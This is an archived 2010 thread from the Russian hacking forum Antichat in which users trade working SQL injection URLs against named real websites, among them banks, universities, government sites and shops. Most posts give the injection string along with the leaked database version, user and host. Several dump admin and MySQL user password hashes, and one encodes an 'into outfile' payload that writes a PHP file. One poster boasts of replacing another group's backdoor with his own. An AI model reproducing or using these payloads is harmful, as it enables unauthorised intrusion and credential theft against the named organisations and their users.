ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.04.2010, 15:54
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Если кому интересно, большинство сайтов тицастые и пиаристые.
---1---
http://www.ogirk.ru/news/2010-04-12/-golos'+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15,16+from+users--+.html
кабинет присутствует.
---2 : сайт какой-то фирмы---
http://perfectseo.ru/linker/reception_title.php?c=1'+or(1,1)=(select+count(*), concat((select+concat_ws(0x3a,email,password,name, user_group)+from+dimigo_users+LIMIT+0,1),floor(ran d(0)*2))from(information_schema.tables)+GROUP+BY+2 )--+
Нашел эту фирму по оставленому от них бекдору. Естественно их я удалил, багу закрыл, своё залил. (:
---3---
http://www.sosedi.perm.ru/rubriks.php?n=-1'+union+select+1,group_concat(version(),0x3a,user (),0x3a,database())--+
5.0.51a-log
alphaoboz_sosed@localhost
alphaoboz_sosed
---4---
http://ad-auto.ru/detail.php?siteid=-16186+union+select+1,2,group_concat(column_name),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72, 73,74+from+information_schema.columns+where+table_ name='user'
Вывод в титле, кто не заметил.
---5---
http://olympicgames.com.ua/archive.phtml?id_rubric=-229+union+select+group_concat(version(),0x3a,user( ),0x3a,database())--+
5.0.45-log
olympicgames@192.168.11.56
olympicgames
---6---
http://www.audit.by/new/?news_id=-487+union+select+1,2,3,4,5,group_concat(version(), 0x3a,user(),0x3a,database()),7--+
4.0.24_Debian-10sarge2-log
auditby2@localhost
auditby2
---7---
http://biz.podolsk.ru/rate.php?id=1+union+select+group_concat(version(), 0x3a,user(),0x3a,database())
5.1.40
bizadmin@localhost
bizadmin
---8---
http://carlson.ru/aerography.php?service=-469'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,group_concat(table_name,0x3a,column_name),16,17,1 8,19,20,21,22,23+from+information_schema.columns+w here+column_name+like+'%pass%'--+
---9---
http://www.ulif.mon. gov.ua/ulif/?mov=runnew&id_run=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,usename+fr om+pg_user+where+usename=user+and+usesuper=$$true$ $--
---10---
http://www.russ-tur.ru/transit-tours/-35125%27+union+select+1,2,3,4,5,6,7,8,9,10,group_c oncat(version(),0x3a,user(),0x3a,database()),12,13--+.html
5.0.67
u11295@78.108.81.201
b11295_2
---11---
http://www.e3e5.com/articles.php?lang=0§ion=14+and+1=cast%28%28SEL ECT+version%28%29||chr%2858%29||user||chr%2858%29| |current_database%28%29+from+information_schema.co lumns+limit+1+offset+0%29+as+int%29
---12---
http://www.dorogajizni.ru/?action=show&id=12762+and+1=cast%28%28SELECT+versi on%28%29||chr%2858%29||user||chr%2858%29||current_ database%28%29+from+information_schema.columns+lim it+1+offset+0%29+as+int%29
---13 : банк 400 тиц---
http://www.econombank.ru/banner/nsclick.php?id=1+or+%281,1%29=%28select+count%280% 29,concat%28version%28%29,floor%28rand%280%29*2%29 %29from%28st_banner_shows%29GROUP+BY+2%29--+
---14---
http://www.obyava.ru/index.php?settown=%C2%F1%E5+%F0%E5%E3%E8%EE%ED%FB% 27+union+select+1,group_concat(version(),0x3a,user (),0x3a,database()),3,4,5,6,7,8,9,10,11,12--+
5.0.41-log
obyava@localhost
auto
---15---
Можно заливать через двойной запрос.
http://www.richtime.ru/?select=catalogue&model_id=-00014722+union+select+1,2,3,4,5,0x35372720756e696f 6e2073656c656374203120696e746f206f757466696c65202f 7661722f7777772f6874646f63732f616e7469636861742e72 752f746573742e70687027202d2d20,7,8,9,10,11,12,13,1 4,15,16,17,18+ from+mysql.user
---16---
http://www.kiteworld.ru/kitelist.php?Id=1&MultiId=-1+union+select+version()--+
4.1.25-log
kiteworl@fe45.hc.ru
wwwkiteworldru
---17 : 1400 тиц---
http://www.etver.ru/job/index.php?go=vacancy&action=detail&id=-4364+union+select+1,2,3,4,5,group_concat%28table_n ame,0x3a,column_name%29,7,8,9,10,11+from+informati on_schema.columns+where+column_name+like+0x2570617 37325--+
---18 : подарок для наркоманов, проституток и кардеров---
https://www.rivercitybankonline.com/event_page.php?evt_id=mxzxpurjn&mode=r&poll_id=-14+union+select+1,2,group_concat(user,0x3a,passwor d,0x3a,file_priv,0x3a,host)+ from+mysql.user--+
---19 : едушка---
http://www.augustana. edu/prebuilt/acal/event.php?mode=js&eventid=1+union+select+1,group_c oncat(user,0x3a,password,0x3a,file_priv),3,4,5,6,7 ,8,9+ from+mysql.user--+
---20 : сами знаете для кого)---
Вроде центральный банк Ганы, вроде есть админка и пользователи. Pr 6, можно загнать пару доров, траст как-бы есть  , а можно что-то другое сделать :P
http://www.bog. gov.gh/index1.php?linkid=65&archiveid=1452+and+1=0+union+ select+group_concat(table_name,0x3a,column_name),2 22+from+information_schema.columns+where+column_na me+like+0x257061737325--+&page=1&adate=23%2F03%2F2010
---21---
http://events.plu. edu/show-event.php?event_id=1039695+union+select+1,group_co ncat(user,0x3a,password,0x3a,file_priv,0x3a,host), 3,4+from+mysql.user--+
---22 : загнал функцию---
http://www.muztorg.ua/catalog/?id=-1+union+select+%28proxywork%28$$ func$$%29::text%29+from+pg_user+LIMIT+1+OFFSET+0--
user - muztorg.attrade bd - ua.attrade version - PostgreSQL 8.2.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
---23---
Пароли вроде как подходят.
http://nano.stanford. edu/model.php?id=-23+union+select+1,2,3,group_concat%28name,0x3a,use rname,0x3a,password,0x3a,access_levels%29,5,6,7,8, 9,10+from+manage_admins+where+access_levels=0x416c 6c--+
---24---
view-source:http://www.gretta.ru/?part=item&cat=1&iid=-1%27+union+select+111,222,333,444,group_concat%28l ogin,0x3a,pass%29+from+admin--+
---25 : Игра---
Так
http://download.beyondunreal.com/browse.php?cat=5%27+or(1,1)=(select+count(0),conca t((select+concat_ws(0x3a,table_name,column_name)+f rom+information_schema.columns+where+column_name+L IKE+%27%password%%27+LIMIT+1,1),floor(rand(0)*2))f rom(information_schema.tables)GROUP+BY+2)--+
или так
view-source:http://download.beyondunreal.com/browse.php?cat=5'+and+1=0+union+select+111,222,333 ,concat_ws(version(),0x3a,database(),0x3a,user()), 555,666+from+--+
Красивый у них mail...
http://mail.beyondunreal.com/
5.0.51b-log
fusion
fusion@ginger
---26---
http://www.tvdata.ru/allpartners.php?id=-12+union+select+1,concat_ws(0x3a,user,password,fil e_priv),3,4,5,6,7,8,9,10,11,12+ from+mysql.user--
(с)v1d0q
Последний раз редактировалось v1d0qz; 19.04.2010 в 16:15..
|
|
|
18.04.2010, 21:21
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Код:
http://www.gigantiaclan.at/index/index.php?site=files&cat=-5%27+OR+1=1/*
MySQL Version: 5.1.41 |
|
|
|
18.04.2010, 23:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.ikwilhelpen.be/iwh/action.php?aid=-1048+union+select+1,2,aes_decrypt(aes_encrypt(conc at(user(),version(),database(),@@version_compile_o s),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69 ,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,8 6,87,88,89,90,91,92,93,94,95,96,97+from+user--
так мало колонок никогда не видал =)
|
|
|
|
18.04.2010, 23:54
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612
Репутация:
94
|
|
Код:
http://www.vintagevirginiaapples.com/Shop_Show_product.php?Product_Id=248+union+select+1,2,3,4,5,6,7--
Database Version: 4.1.22
Database name: apples
User name: apples@localhost |
|
|
|
19.04.2010, 01:10
|
|
Новичок
Регистрация: 17.04.2010
Сообщений: 12
Провел на форуме:
61047
Репутация:
1
|
|
Код:
http://www.bkik.hu/euinfo/showprojects.php?nid=22+union+all+sele ct+1,2, 3,4--
Version : MysqL 4.1 |
|
|
|
19.04.2010, 13:37
|
|
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191
Репутация:
2562
|
|
Код:
http://www.search.uz/review.php?sid=-317104+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a%20,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
User: searchu_se@localhost
Version: 5.0.85-community
Database: searchu_se |
|
|
|
19.04.2010, 15:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.shoppingcenter.ru/catalog/index_category.php?categoryId=6+UNION+SELECT+conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os)--%20&parentId=0&begin=0
Database Version: 5.0.77
Database name: arhicom_sc
User name: arhicom_sc.shopp@localhost
Os : Linux
|
|
|
|
19.04.2010, 20:32
|
|
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191
Репутация:
2562
|
|
Код:
http://www.uh.edu/news-events/newsrelease.php?releaseid_int=-239+union+select+1,concat_ws(0x3a%20,user(),database(),version()),3,4,5,6,7,8--
User: newsUser@europa.matrix.uh.edu
Version: 4.1.16standard-log
Database: uhnews
Google PR: 7 |
|
|
|
19.04.2010, 22:43
|
|
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997
Репутация:
66
|
|
Код:
http://www.aaaahotels.com/detail.php?id=-535+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
User: aaaahotels@localhost
Version: 5.0.32-Debian_7etch11-log
Database: aaaahotels_com
Google PR: 5
Код:
http://www.evergreenrecreation.com/facilities.php?id=-10+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6,7,8,9,10,11,12--
User: db49768@72.47.224.26
Version: 5.0.51a-24+lenny1
Database: db49768_eprd
Google PR: 4
Код:
http://www.eamesgallery.com/cart/prod_subcat.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,12,13--
User: eamesgal@localhost
Version: 4.0.27-standard
Database: eamesgal_eostore
Google PR: 6
Код:
http://encycl.anthropology.ru/article.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,10--
User: anthropo_visitor@localhost
Version: 5.0.90-community-log
Database: anthropo_encycl
Google PR: 5
Код:
http://www.fondsk.ru/article.php?id=-1529+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Мб повторяюсь...!
User: u32888@10.10.10.224
Version: 5.0.67-log
Database: u32888
Google PR: 5
Код:
http://www.stots.edu/article.php?id=-25+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7,8--
User: pe@localhost
Version: 4.1.22-standard
Database: stots_pe
Google PR: 6
Последний раз редактировалось av1; 19.04.2010 в 23:55..
|
|
|
|
20.04.2010, 02:15
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
продолжение этого поста:
Код:
http://uasc.org.ua/2010/04/знімаємо-капелюха-redhat-sql-inj/comment-page-1/#comment-504
Код:
http://www.es.redhat.com/news/article/3027+and+5=4+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13.html
user(): www@localhost
version(): 5.0.77-log
database(): redhateurope |
|
|
|
|
|
|
|
Здесь присутствуют: 21 (пользователей: 0 , гостей: 21)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2083521){kind=avatar}
Похожие темы
Линейный вид
